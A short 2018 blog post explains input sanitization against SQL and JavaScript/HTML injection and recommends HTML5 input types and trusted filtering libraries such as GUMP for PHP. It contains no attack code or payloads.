jueves, 3 de mayo de 2018

Clean your shoes before entering the house.

Data sanitization is a simple yet effective tool to preventing attacks. What kind of attacks? you may ask, well many, but all can be summarised as code injection.

In web applications you may encounter with a form, any form, that lets you write whatever string and maybe do something with it, display it as a comment, save it in the data base, send it as message, etc. But lets say that instead of jut plain text, I write a piece of code, and if the input isn't sanitized the page will run that code, and the results can be disastrous. Let the people at computerphile explain it better: 
there are quite some kinds of code injection but here as the most common ones:

SQL injection: As the name indicates, is meant to attack SQL databases, adding sql scripts to the un-sanitized input can result in the database running said queries and returning data that should be read by the user. More info.

Javascript and HTML injection: By adding Javascript and HTML code to un-sanitized inputs can cause the browser to run and make the page behave in unwanted ways, this can potentially affect other users ass well. More info.

A simple solution to this problem is input sanitization, it cleans your inputs so that malicious code can't be written into it. You can do this by preventing certain characters or sets of characters to be typed in your input. Maybe banning the single quote or the <> brackets. The people at eSecurity Planet wrote a very in depth article on how to protect your web applications using code sanitization, there are many things you can do. Since HTML5, input type can be added to any input tag, and that can be a small step into making sure that the incoming data will only be read if it is of the specified type, like email or phone number.

But as teacher Ken always says, never roll out your own security, is best to implement good libraries that you thrust to add input sanitization to your page, for example if you are using PHP you can filter inputs using GUMP. There are many good tools out there, just make sure that you fully trust the said library, and don't add things you don't know to your code just like so.

No hay comentarios:

Publicar un comentario

SEO test

This is not allowed: this isnt't allowed either:  this is allowed: